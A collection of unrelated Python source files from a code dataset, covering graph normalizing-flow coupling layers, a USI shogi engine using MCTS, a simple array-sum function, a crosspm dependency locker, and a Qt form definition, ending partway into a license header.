StarcoderdataPython
|
6495010
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from mflow.models.basic import GraphLinear, GraphConv, ActNorm, ActNorm2D
# class AffineCoupling(nn.Module):
# def __init__(self, in_channel, hidden_channels, affine=True): # filter_size=512, --> hidden_channels =(512, 512)
# super(AffineCoupling, self).__init__()
#
# self.affine = affine
# self.layers = nn.ModuleList()
# self.norms = nn.ModuleList()
# # self.norms_in = nn.ModuleList()
# last_h = in_channel // 2
# if affine:
# vh = tuple(hidden_channels) + (in_channel,)
# else:
# vh = tuple(hidden_channels) + (in_channel // 2,)
#
# for h in vh:
# self.layers.append(nn.Conv2d(last_h, h, kernel_size=3, padding=1))
# self.norms.append(nn.BatchNorm2d(h)) #, momentum=0.9 may change norm later, where to use norm? for the residual? or the sum
# # self.norms.append(ActNorm(in_channel=h, logdet=False)) # similar but not good
# last_h = h
#
# def forward(self, input):
# in_a, in_b = input.chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32)
#
# if self.affine:
# # log_s, t = self.net(in_a).chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32)
# s, t = self._s_t_function(in_a)
# out_b = (in_b + t) * s # different affine bias , no difference to the log-det # (2,6,32,32) More stable, less error
# # out_b = in_b * s + t
# logdet = torch.sum(torch.log(torch.abs(s)).view(input.shape[0], -1), 1)
#
# else: # add coupling
# # net_out = self.net(in_a)
# _, t = self._s_t_function(in_a)
# out_b = in_b + t
# logdet = None
#
# return torch.cat([in_a, out_b], 1), logdet
#
# def reverse(self, output):
# out_a, out_b = output.chunk(2, 1)
#
# if self.affine:
# s, t = self._s_t_function(out_a)
# in_b = out_b / s - t # More stable, less error s must not equal to 0!!!
# # in_b = (out_b - t) / s
# else:
# _, t = self._s_t_function(out_a)
# in_b = out_b - t
#
# return torch.cat([out_a, in_b], 1)
#
# def _s_t_function(self, x):
# h = x
# for i in range(len(self.layers)-1):
# h = self.layers[i](h)
# h = self.norms[i](h)
# # h = torch.tanh(h) # tanh may be more stable?
# h = torch.relu(h) #
# h = self.layers[-1](h)
#
# s = None
# if self.affine:
# # residual net for doubling the channel. Do not use residual, unstable
# log_s, t = h.chunk(2, 1)
# # s = torch.sigmoid(log_s + 2) # (2,6,32,32) # s != 0 and t can be arbitrary : Why + 2??? more stable, keep s != 0!!! exp is not stable
# s = torch.sigmoid(log_s) # works good when actnorm
# # s = torch.tanh(log_s) # can not use tanh
# # s = torch.sign(log_s) # lower reverse error if no actnorm, similar results when have actnorm
#
# else:
# t = h
# return s, t
class AffineCoupling(nn.Module): # delete
    """Affine coupling layer (RealNVP/Glow style) for channel-split tensors.

    The input is split in two along the channel axis; a small CNN on one
    half produces scale ``s`` and shift ``t`` for the other half, which
    keeps the Jacobian triangular so the log-determinant is cheap.
    """
    def __init__(self, in_channel, hidden_channels, affine=True, mask_swap=False): # filter_size=512, --> hidden_channels =(512, 512)
        super(AffineCoupling, self).__init__()

        self.affine = affine
        self.layers = nn.ModuleList()
        self.norms = nn.ModuleList()
        self.mask_swap=mask_swap
        # self.norms_in = nn.ModuleList()
        last_h = in_channel // 2
        # Final conv emits 2x channels in affine mode (chunked into log_s
        # and t below) and 1x in additive mode (t only).
        if affine:
            vh = tuple(hidden_channels) + (in_channel,)
        else:
            vh = tuple(hidden_channels) + (in_channel // 2,)

        for h in vh:
            self.layers.append(nn.Conv2d(last_h, h, kernel_size=3, padding=1))
            self.norms.append(nn.BatchNorm2d(h))  # , momentum=0.9 may change norm later, where to use norm? for the residual? or the sum
            # self.norms.append(ActNorm(in_channel=h, logdet=False)) # similar but not good
            last_h = h

    def forward(self, input):
        """Return (output, logdet); logdet is None in additive mode."""
        in_a, in_b = input.chunk(2, 1)  # (2,12,32,32) --> (2,6,32,32), (2,6,32,32)
        if self.mask_swap:
            in_a, in_b = in_b, in_a

        if self.affine:
            # log_s, t = self.net(in_a).chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32)
            s, t = self._s_t_function(in_a)
            out_b = (in_b + t) * s  # different affine bias , no difference to the log-det # (2,6,32,32) More stable, less error
            # out_b = in_b * s + t
            logdet = torch.sum(torch.log(torch.abs(s)).view(input.shape[0], -1), 1)
        else:  # add coupling
            # net_out = self.net(in_a)
            _, t = self._s_t_function(in_a)
            out_b = in_b + t
            logdet = None

        if self.mask_swap:
            result = torch.cat([out_b, in_a], 1)
        else:
            result = torch.cat([in_a, out_b], 1)
        return result, logdet

    def reverse(self, output):
        """Invert forward(): recover the input from the output."""
        out_a, out_b = output.chunk(2, 1)
        if self.mask_swap:
            out_a, out_b = out_b, out_a

        if self.affine:
            s, t = self._s_t_function(out_a)
            in_b = out_b / s - t  # More stable, less error   s must not equal to 0!!!
            # in_b = (out_b - t) / s
        else:
            _, t = self._s_t_function(out_a)
            in_b = out_b - t

        if self.mask_swap:
            result = torch.cat([in_b, out_a], 1)
        else:
            result = torch.cat([out_a, in_b], 1)
        return result

    def _s_t_function(self, x):
        """Compute scale s (None in additive mode) and shift t from one half."""
        h = x
        for i in range(len(self.layers)-1):
            h = self.layers[i](h)
            h = self.norms[i](h)
            # h = torch.tanh(h)  # tanh may be more stable?
            h = torch.relu(h)  #
        h = self.layers[-1](h)

        s = None
        if self.affine:
            # residual net for doubling the channel. Do not use residual, unstable
            log_s, t = h.chunk(2, 1)
            # s = torch.sigmoid(log_s + 2)  # (2,6,32,32) # s != 0 and t can be arbitrary : Why + 2??? more stable, keep s != 0!!! exp is not stable
            # sigmoid keeps s in (0, 1), bounded away from the instability of exp.
            s = torch.sigmoid(log_s)  # works good when actnorm
            # s = torch.tanh(log_s) # can not use tanh
            # s = torch.sign(log_s) # lower reverse error if no actnorm, similar results when have actnorm
        else:
            t = h
        return s, t
class GraphAffineCoupling(nn.Module):
    """Affine coupling layer over graph node features.

    A binary row mask fixes one subset of nodes (input to the s/t network)
    while the complementary rows are affinely transformed; GraphConv layers
    condition the transform on the adjacency tensor.
    """
    def __init__(self, n_node, in_dim, hidden_dim_dict, masked_row, affine=True):
        super(GraphAffineCoupling, self).__init__()
        self.n_node = n_node
        self.in_dim = in_dim
        self.hidden_dim_dict = hidden_dim_dict
        self.masked_row = masked_row
        self.affine = affine

        self.hidden_dim_gnn = hidden_dim_dict['gnn']
        self.hidden_dim_linear = hidden_dim_dict['linear']

        # Graph-convolution stack producing node embeddings.
        self.net = nn.ModuleList()
        self.norm = nn.ModuleList()
        last_dim = in_dim
        for out_dim in self.hidden_dim_gnn:  # What if use only one gnn???
            self.net.append(GraphConv(last_dim, out_dim))
            self.norm.append(nn.BatchNorm1d(n_node))  # , momentum=0.9 Change norm!!!
            # self.norm.append(ActNorm2D(in_dim=n_node, logdet=False))
            last_dim = out_dim

        # Linear head mapping embeddings to the s/t parameters.
        self.net_lin = nn.ModuleList()
        self.norm_lin = nn.ModuleList()
        for out_dim in self.hidden_dim_linear:  # What if use only one gnn???
            self.net_lin.append(GraphLinear(last_dim, out_dim))
            self.norm_lin.append(nn.BatchNorm1d(n_node))  # , momentum=0.9 Change norm!!!
            # self.norm_lin.append(ActNorm2D(in_dim=n_node, logdet=False))
            last_dim = out_dim

        if affine:
            # Twice the width: chunked into log_s and t in _s_t_function.
            self.net_lin.append(GraphLinear(last_dim, in_dim*2))
        else:
            self.net_lin.append(GraphLinear(last_dim, in_dim))

        self.scale = nn.Parameter(torch.zeros(1))  # nn.Parameter(torch.ones(1)) #
        # mask==1 rows pass through unchanged and feed the s/t network;
        # mask==0 rows are the ones transformed.
        mask = torch.ones(n_node, in_dim)
        mask[masked_row, :] = 0  # masked_row are kept same, and used for _s_t for updating the left rows
        self.register_buffer('mask', mask)

    def forward(self, adj, input):
        """Return (output, logdet); logdet is None in additive mode."""
        masked_x = self.mask * input
        s, t = self._s_t_function(adj, masked_x)  # s must not equal to 0!!!
        if self.affine:
            out = masked_x + (1-self.mask) * (input + t) * s
            # out = masked_x + (1-self.mask) * (input * s + t)
            logdet = torch.sum(torch.log(torch.abs(s)).view(input.shape[0], -1), 1)  # possibly wrong answer
        else:  # add coupling
            out = masked_x + t*(1-self.mask)
            logdet = None
        return out, logdet

    def reverse(self, adj, output):
        """Invert forward(): recover the input from the output."""
        masked_y = self.mask * output
        s, t = self._s_t_function(adj, masked_y)
        if self.affine:
            input = masked_y + (1 - self.mask) * (output / s - t)
            # input = masked_x + (1 - self.mask) * ((output-t) / s)
        else:
            input = masked_y + (1 - self.mask) * (output - t)
        return input

    def _s_t_function(self, adj, x):
        """Compute scale s (None in additive mode) and shift t from masked x."""
        # adj: (2,4,9,9)  x: # (2,9,5)
        s = None
        h = x
        for i in range(len(self.net)):
            h = self.net[i](adj, h)  # (2,1,9,hidden_dim)
            h = self.norm[i](h)
            # h = torch.tanh(h)  # tanh may be more stable
            h = torch.relu(h)  # use relu!!!

        for i in range(len(self.net_lin)-1):
            h = self.net_lin[i](h)  # (2,1,9,hidden_dim)
            h = self.norm_lin[i](h)
            # h = torch.tanh(h)
            h = torch.relu(h)

        h = self.net_lin[-1](h)
        # h =h * torch.exp(self.scale*2)

        if self.affine:
            log_s, t = h.chunk(2, dim=-1)
            # sigmoid keeps s in (0, 1), never exactly 0 in float arithmetic.
            # x = sigmoid(log_x+bias): glow code Top 1 choice, keep s away from 0, s!!!!= 0  always safe!!!
            # And get the signal from added noise in the  input
            # s = torch.sigmoid(log_s + 2)
            s = torch.sigmoid(log_s)  # better validity + actnorm
            # s = torch.tanh(log_s)  # Not stable when s =0 for synthesis data, but works well for real data in best case....
            # s = torch.sign(s)
            # s = torch.sign(log_s)
            # s = F.softplus(log_s) # negative nll
            # s = torch.sigmoid(log_s)  # little worse than +2, # *self.scale #!!! # scale leads to nan results
            # s = torch.tanh(log_s+2) # not that good
            # s = torch.relu(log_s) # nan results
            # s = log_s # nan results
            # s = torch.exp(log_s) # nan results
        else:
            t = h
        return s, t
def test_AffineCoupling():
    """Smoke-test AffineCoupling: forward then reverse should round-trip."""
    from mflow.models.model import rescale_adj
    torch.manual_seed(0)
    bs = 2
    nodes = 9
    ch = 5
    num_edge_type = 4
    # x = torch.ones((bs, nodes, ch), dtype=torch.float32)  # 2 for duplicated flow for transforming whole info
    adj = torch.randint(0, 2, (bs, num_edge_type, nodes, nodes), dtype=torch.float32)
    # adj = rescale_adj(adj)
    # BUGFIX: hidden_channels was the set literal {512, 512}, which collapses
    # to {512} (a single hidden layer) and has no defined order; a tuple
    # builds the intended two 512-channel hidden layers.
    gc = AffineCoupling(in_channel=4, hidden_channels=(512, 512), affine=True)
    out = gc(adj)
    print('adj.shape:', adj.shape)
    # print('out', out.shape)  # (bs, out_ch)
    print(out[0].shape, out[1].shape)
    r = gc.reverse(out[0])
    print(r.shape)
    print(r)
    print('torch.abs(r-adj).mean():', torch.abs(r - adj).mean())
def test_GraphAffineCoupling():
    """Smoke-test GraphAffineCoupling: reverse(forward(x)) should recover x."""
    from mflow.models.model import rescale_adj
    torch.manual_seed(0)
    batch_size, n_nodes, n_ch, n_edge_types = 2, 9, 5, 4
    x = torch.randint(0, 2, (batch_size, n_nodes, n_ch), dtype=torch.float32)
    adj = torch.randint(0, 2, (batch_size, n_edge_types, n_nodes, n_nodes),
                        dtype=torch.float32)
    adj = rescale_adj(adj)

    hidden_dim_dict = {'gnn': [8, 64], 'linear': [8]}
    coupling = GraphAffineCoupling(n_nodes, n_ch, hidden_dim_dict,
                                   masked_row=range(0, n_nodes, 2), affine=True)

    out = coupling(adj, x)
    print('in', x.shape, adj.shape)
    print(out[0].shape, out[1].shape)
    print(out)
    r = coupling.reverse(adj, out[0])
    print(r)
    print(r.shape)
    print('torch.abs(r-x).mean():', torch.abs(r - x).mean())
if __name__ == '__main__':
    # Manual smoke tests; only the plain AffineCoupling test is active.
    # test_AdditiveAdjCoupling()
    # test_AdditiveNodeFeatureCoupling()
    # test_GraphAffineCoupling()
    test_AffineCoupling()
|
StarcoderdataPython
|
11316282
|
import minishogilib
import numpy as np
import os
from optparse import OptionParser
import sys
import tensorflow as tf
import threading
import mcts
import network
class USI:
    """Minimal USI (Universal Shogi Interface) engine front-end.

    Reads USI commands from stdin, drives an MCTS search backed by a
    neural network, and writes engine responses to stdout.
    """
    def __init__(self, weight_file):
        # Path to network weights; may be None (randomly initialized net).
        self.weight_file = weight_file
        self.nn = None
        self.search = None
        # Engine options adjustable via the USI 'setoption' command.
        self.option = {
            'ponder': False,
            'softmax_sampling_moves': 30
        }

    def isready(self):
        """Lazily build the network, search and position (USI 'isready')."""
        if self.nn is None:
            self.nn = network.Network()
            if self.weight_file is not None:
                self.nn.load(self.weight_file)
        self.config = mcts.Config()
        # Effectively unbounded simulations; search is stopped by time.
        self.config.simulation_num = int(1e9)
        self.config.reuse_tree = True
        if self.search is None:
            self.search = mcts.MCTS(self.config)
        self.search.clear()
        self.position = minishogilib.Position()
        # ponder
        self.ponder_thread = None

    def start(self):
        """Main USI command loop; blocks reading stdin until 'quit'."""
        while True:
            line = input()
            if not line:
                continue
            command = line.split()
            if command[0] == 'usi':
                print('id name erweitern_55')
                print('id author nyashiki')
                print('usiok')
            elif command[0] == 'setoption':
                # Expected form: setoption name <key> value <value>.
                key = command[2]
                value = command[4]
                if value == 'true' or value == 'True':
                    value = True
                elif value == 'false' or value == 'False':
                    value = False
                elif value.isdigit():
                    value = int(value)
                self.option[key.lower()] = value
            elif command[0] == 'position':
                # A new position invalidates any running ponder search.
                self.ponder_stop()
                if command[1] == 'sfen':
                    sfen_kif = ' '.join(command[2:])
                    self.position.set_sfen(sfen_kif)
                elif command[1] == 'startpos':
                    self.position.set_start_position()
                else:
                    print('ERROR: Unknown protocol.')
            elif command[0] == 'isready':
                self.isready()
                print('readyok')
            elif command[0] == 'usinewgame':
                pass
            elif command[0] == 'go':
                # Collect the time-control parameters following 'go'.
                timelimit = {}
                for (i, val) in enumerate(command):
                    if val == 'btime':
                        timelimit['btime'] = int(command[i + 1])
                    elif val == 'wtime':
                        timelimit['wtime'] = int(command[i + 1])
                    elif val == 'byoyomi':
                        timelimit['byoyomi'] = int(command[i + 1])
                moves = self.position.generate_moves()
                if len(moves) == 0:
                    print('bestmove resign')
                else:
                    # Prefer a forced mate found by shallow DFS.
                    checkmate, checkmate_move = self.position.solve_checkmate_dfs(
                        7)
                    if checkmate:
                        best_move = checkmate_move
                    else:
                        # NOTE(review): assumes btime/wtime/byoyomi were all
                        # supplied with 'go'; a missing key raises KeyError.
                        remain_time = timelimit['btime'] if self.position.get_side_to_move(
                        ) == 0 else timelimit['wtime']
                        think_time = remain_time // 10
                        if think_time < timelimit['byoyomi']:
                            think_time = remain_time + timelimit['byoyomi']
                        print('info string think time {}'.format(
                            think_time), flush=True)
                        root = self.search.run(
                            self.position, self.nn, think_time, True)
                        # Early in the game, sample among top moves for variety.
                        if self.position.get_ply() < self.option['softmax_sampling_moves']:
                            best_move = self.search.softmax_sample_among_top_moves(
                                root)
                        else:
                            best_move = self.search.best_move(root)
                    print('bestmove {}'.format(best_move), flush=True)
                    self.position.do_move(best_move)
                    self.ponder_start()
            elif command[0] == 'd':
                # Debug helper: print the current position.
                self.position.print()
            elif command[0] == 'quit':
                os._exit(0)
            else:
                print('ERROR: Unknown command.', command[0])

    def ponder_start(self):
        """
        position: This position turn should be the other player's.

        Starts a background search thread while the opponent thinks.
        """
        self.ponder_thread = threading.Thread(
            target=self.search.run, args=(self.position, self.nn, 0, True, not self.option['ponder']))
        self.ponder_thread.start()

    def ponder_stop(self):
        """Stop a running ponder search, if any, and join its thread."""
        if self.ponder_thread is not None:
            self.search.stop()
            self.ponder_thread.join()
            self.ponder_thread = None
if __name__ == '__main__':
    # Parse command-line options and hand control to the USI loop.
    arg_parser = OptionParser()
    arg_parser.add_option('-w', '--weight_file', dest='weight_file',
                          default=None,
                          help='Weights of neural network parameters')
    parsed_options, _ = arg_parser.parse_args()
    USI(parsed_options.weight_file).start()
|
StarcoderdataPython
|
5167400
|
def aVeryBigSum(ar):
    """Return the sum of the elements of ``ar``.

    Python ints are arbitrary precision, so very large values need no
    special handling.  Returns 0 for an empty sequence.
    """
    # BUGFIX: the original looped over ar recomputing sum(ar) on every
    # iteration (O(n^2)) and raised NameError on empty input; a single
    # sum() call fixes both.
    return sum(ar)
# Sample input mirroring the HackerRank "A Very Big Sum" example.
ar = [1000000001, 1000000002, 1000000003, 1000000004, 1000000005]
print(aVeryBigSum(ar))
# print(ar)
|
StarcoderdataPython
|
3425576
|
# -*- coding: utf-8 -*-
from crosspm.helpers.locker import Locker
class Usedby(Locker):
    """Locker variant that resolves reverse dependencies ("used by")
    instead of locking forward dependencies."""
    def __init__(self, config, do_load, recursive):
        # Ignore do_load flag
        # NOTE(review): do_load is accepted for interface compatibility
        # with Locker but deliberately forced to False here.
        super(Usedby, self).__init__(config, False, recursive)

    def usedby_packages(self, deps_file_path=None, depslock_file_path=None, packages=None):
        """
        Lock packages. Downloader search packages

        Falls back to the instance's configured paths when the file-path
        arguments are None; when ``packages`` is given, dependency search
        is skipped and the list is used directly.
        """
        if deps_file_path is None:
            deps_file_path = self._deps_path
        if depslock_file_path is None:
            depslock_file_path = self._depslock_path
        # Avoid reading and writing the same file.
        if deps_file_path == depslock_file_path:
            depslock_file_path += '.lock'

        if packages is None:
            self.search_dependencies(deps_file_path)
        else:
            self._root_package.packages = packages

        self._log.info('Done!')

    def search_dependencies(self, depslock_file_path):
        """Populate the root package's reverse-dependency tree from the lock file."""
        self._log.info('Check dependencies ...')
        self._root_package.find_usedby(depslock_file_path, property_validate=True)
        self._log.info('')

    def entrypoint(self, *args, **kwargs):
        # Uniform CLI entry point delegating to usedby_packages.
        self.usedby_packages(*args, **kwargs)
|
StarcoderdataPython
|
132828
|
# -*- coding: utf-8 -*-
from ..vendor import Qt
from ..vendor.Qt import QtCore, QtGui, QtWidgets
class Ui_Form(object):
    """uic-style UI definition for the "partition" settings form.

    setupUi builds the widget tree and layouts; retranslateUi assigns all
    user-visible strings so they can be localized in one place.
    NOTE(review): this mirrors pyside2-uic generated code — if a .ui source
    exists, edit that instead of this file.
    """

    def setupUi(self, Form):
        """Create and arrange all widgets on Form, then connect slots by name."""
        Form.setObjectName("Form")
        Form.resize(556, 258)
        Form.setMinimumSize(QtCore.QSize(0, 0))
        self.gridLayout = QtWidgets.QGridLayout(Form)
        self.gridLayout.setObjectName("gridLayout")
        # OK / Cancel buttons at the bottom of the form.
        self.buttonbox = QtWidgets.QDialogButtonBox(Form)
        self.buttonbox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
        self.buttonbox.setObjectName("buttonbox")
        self.gridLayout.addWidget(self.buttonbox, 1, 0, 1, 1)
        self.verticalLayout_5 = QtWidgets.QVBoxLayout()
        self.verticalLayout_5.setContentsMargins(-1, 0, -1, -1)
        self.verticalLayout_5.setObjectName("verticalLayout_5")
        self.verticalLayout = QtWidgets.QVBoxLayout()
        self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)
        self.verticalLayout.setContentsMargins(-1, 5, -1, 5)
        self.verticalLayout.setObjectName("verticalLayout")
        self.groupBox_2 = QtWidgets.QGroupBox(Form)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth())
        self.groupBox_2.setSizePolicy(sizePolicy)
        self.groupBox_2.setMinimumSize(QtCore.QSize(0, 0))
        self.groupBox_2.setObjectName("groupBox_2")
        self.gridLayout_3 = QtWidgets.QGridLayout(self.groupBox_2)
        self.gridLayout_3.setObjectName("gridLayout_3")
        self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_9.setSpacing(0)
        self.horizontalLayout_9.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
        self.horizontalLayout_9.setContentsMargins(-1, 0, -1, 0)
        self.horizontalLayout_9.setObjectName("horizontalLayout_9")
        # button_preview: empty layout — presumably filled with a preview
        # widget at runtime; confirm against the controller code.
        self.button_preview = QtWidgets.QHBoxLayout()
        self.button_preview.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
        self.button_preview.setObjectName("button_preview")
        self.horizontalLayout_9.addLayout(self.button_preview)
        self.verticalLayout_2 = QtWidgets.QVBoxLayout()
        self.verticalLayout_2.setSpacing(1)
        self.verticalLayout_2.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
        self.verticalLayout_2.setContentsMargins(-1, 0, -1, 0)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        # Row: button position (x, y) spin boxes.
        self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_5.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
        self.horizontalLayout_5.setContentsMargins(-1, 0, -1, -1)
        self.horizontalLayout_5.setObjectName("horizontalLayout_5")
        spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_5.addItem(spacerItem)
        self.label_7 = QtWidgets.QLabel(self.groupBox_2)
        self.label_7.setObjectName("label_7")
        self.horizontalLayout_5.addWidget(self.label_7)
        self.spinbox_btn_position_x = QtWidgets.QSpinBox(self.groupBox_2)
        self.spinbox_btn_position_x.setMinimumSize(QtCore.QSize(70, 0))
        self.spinbox_btn_position_x.setMaximumSize(QtCore.QSize(16777215, 16777215))
        self.spinbox_btn_position_x.setMaximum(9999)
        self.spinbox_btn_position_x.setObjectName("spinbox_btn_position_x")
        self.horizontalLayout_5.addWidget(self.spinbox_btn_position_x)
        self.label_6 = QtWidgets.QLabel(self.groupBox_2)
        self.label_6.setObjectName("label_6")
        self.horizontalLayout_5.addWidget(self.label_6)
        self.spinbox_btn_position_y = QtWidgets.QSpinBox(self.groupBox_2)
        self.spinbox_btn_position_y.setMinimumSize(QtCore.QSize(70, 0))
        self.spinbox_btn_position_y.setMaximum(9999)
        self.spinbox_btn_position_y.setObjectName("spinbox_btn_position_y")
        self.horizontalLayout_5.addWidget(self.spinbox_btn_position_y)
        self.verticalLayout_2.addLayout(self.horizontalLayout_5)
        # Row: line length spin box.
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setContentsMargins(-1, 0, -1, -1)
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem1)
        self.label = QtWidgets.QLabel(self.groupBox_2)
        self.label.setObjectName("label")
        self.horizontalLayout_2.addWidget(self.label)
        self.spinbox_line_length = QtWidgets.QSpinBox(self.groupBox_2)
        self.spinbox_line_length.setMinimumSize(QtCore.QSize(70, 0))
        self.spinbox_line_length.setMaximum(9999)
        self.spinbox_line_length.setObjectName("spinbox_line_length")
        self.horizontalLayout_2.addWidget(self.spinbox_line_length)
        self.verticalLayout_2.addLayout(self.horizontalLayout_2)
        # Row: line width spin box.
        self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_8.setContentsMargins(-1, 0, -1, -1)
        self.horizontalLayout_8.setObjectName("horizontalLayout_8")
        spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_8.addItem(spacerItem2)
        self.label_8 = QtWidgets.QLabel(self.groupBox_2)
        self.label_8.setObjectName("label_8")
        self.horizontalLayout_8.addWidget(self.label_8)
        self.spinbox_line_width = QtWidgets.QSpinBox(self.groupBox_2)
        self.spinbox_line_width.setMinimumSize(QtCore.QSize(70, 0))
        self.spinbox_line_width.setMaximum(9999)
        self.spinbox_line_width.setObjectName("spinbox_line_width")
        self.horizontalLayout_8.addWidget(self.spinbox_line_width)
        self.verticalLayout_2.addLayout(self.horizontalLayout_8)
        # Row: style combo box (items named in retranslateUi).
        self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_11.setSpacing(6)
        self.horizontalLayout_11.setContentsMargins(-1, 0, -1, -1)
        self.horizontalLayout_11.setObjectName("horizontalLayout_11")
        spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_11.addItem(spacerItem3)
        self.label_5 = QtWidgets.QLabel(self.groupBox_2)
        self.label_5.setObjectName("label_5")
        self.horizontalLayout_11.addWidget(self.label_5)
        self.combo_style = QtWidgets.QComboBox(self.groupBox_2)
        self.combo_style.setObjectName("combo_style")
        self.combo_style.addItem("")
        self.combo_style.addItem("")
        self.horizontalLayout_11.addWidget(self.combo_style)
        self.verticalLayout_2.addLayout(self.horizontalLayout_11)
        # Row: label font size spin box.
        self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_3.setContentsMargins(-1, 0, -1, -1)
        self.horizontalLayout_3.setObjectName("horizontalLayout_3")
        spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_3.addItem(spacerItem4)
        self.label_4 = QtWidgets.QLabel(self.groupBox_2)
        self.label_4.setObjectName("label_4")
        self.horizontalLayout_3.addWidget(self.label_4)
        self.spinbox_label_font_size = QtWidgets.QSpinBox(self.groupBox_2)
        self.spinbox_label_font_size.setMinimumSize(QtCore.QSize(70, 0))
        self.spinbox_label_font_size.setObjectName("spinbox_label_font_size")
        self.horizontalLayout_3.addWidget(self.spinbox_label_font_size)
        self.verticalLayout_2.addLayout(self.horizontalLayout_3)
        # Row: optional label text (checkbox toggles use of the line edit).
        self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_4.setContentsMargins(-1, 0, -1, -1)
        self.horizontalLayout_4.setObjectName("horizontalLayout_4")
        spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_4.addItem(spacerItem5)
        self.checkbox_use_label = QtWidgets.QCheckBox(self.groupBox_2)
        self.checkbox_use_label.setText("")
        self.checkbox_use_label.setChecked(True)
        self.checkbox_use_label.setObjectName("checkbox_use_label")
        self.horizontalLayout_4.addWidget(self.checkbox_use_label)
        self.label_label = QtWidgets.QLabel(self.groupBox_2)
        self.label_label.setObjectName("label_label")
        self.horizontalLayout_4.addWidget(self.label_label)
        self.line_label = QtWidgets.QLineEdit(self.groupBox_2)
        self.line_label.setObjectName("line_label")
        self.horizontalLayout_4.addWidget(self.line_label)
        self.verticalLayout_2.addLayout(self.horizontalLayout_4)
        # Row: color picker button.
        self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_12.setContentsMargins(-1, -1, -1, 0)
        self.horizontalLayout_12.setObjectName("horizontalLayout_12")
        spacerItem6 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_12.addItem(spacerItem6)
        self.label_2 = QtWidgets.QLabel(self.groupBox_2)
        self.label_2.setObjectName("label_2")
        self.horizontalLayout_12.addWidget(self.label_2)
        self.button_color = QtWidgets.QPushButton(self.groupBox_2)
        self.button_color.setObjectName("button_color")
        self.horizontalLayout_12.addWidget(self.button_color)
        self.verticalLayout_2.addLayout(self.horizontalLayout_12)
        # Assemble: preview area gets 2/3 width, settings column 1/3.
        self.horizontalLayout_9.addLayout(self.verticalLayout_2)
        self.horizontalLayout_9.setStretch(0, 2)
        self.horizontalLayout_9.setStretch(1, 1)
        self.gridLayout_3.addLayout(self.horizontalLayout_9, 0, 0, 1, 1)
        self.verticalLayout.addWidget(self.groupBox_2)
        self.verticalLayout_5.addLayout(self.verticalLayout)
        self.gridLayout.addLayout(self.verticalLayout_5, 0, 0, 1, 1)
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)

    def retranslateUi(self, Form):
        """Assign every user-visible string (single localization point)."""
        Form.setWindowTitle(Qt.QtCompat.translate("Form", "Form", None, -1))
        self.groupBox_2.setTitle(Qt.QtCompat.translate("Form", "partition", None, -1))
        self.label_7.setText(Qt.QtCompat.translate("Form", "Position ", None, -1))
        self.label_6.setText(Qt.QtCompat.translate("Form", "×", None, -1))
        self.label.setText(Qt.QtCompat.translate("Form", "LineLength ", None, -1))
        self.label_8.setText(Qt.QtCompat.translate("Form", "LineWidth ", None, -1))
        self.label_5.setText(Qt.QtCompat.translate("Form", "Style ", None, -1))
        self.combo_style.setItemText(0, Qt.QtCompat.translate("Form", "Horizontal", None, -1))
        self.combo_style.setItemText(1, Qt.QtCompat.translate("Form", "Vertical", None, -1))
        self.label_4.setText(Qt.QtCompat.translate("Form", "Label Font Size ", None, -1))
        self.label_label.setText(Qt.QtCompat.translate("Form", "Label ", None, -1))
        self.label_2.setText(Qt.QtCompat.translate("Form", "Color", None, -1))
        self.button_color.setText(Qt.QtCompat.translate("Form", "SelectColor", None, -1))
|
StarcoderdataPython
|
1853424
|
<reponame>hzy001/xgboost-serving-1<filename>tensorflow_serving/example/xgboost_client.py
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
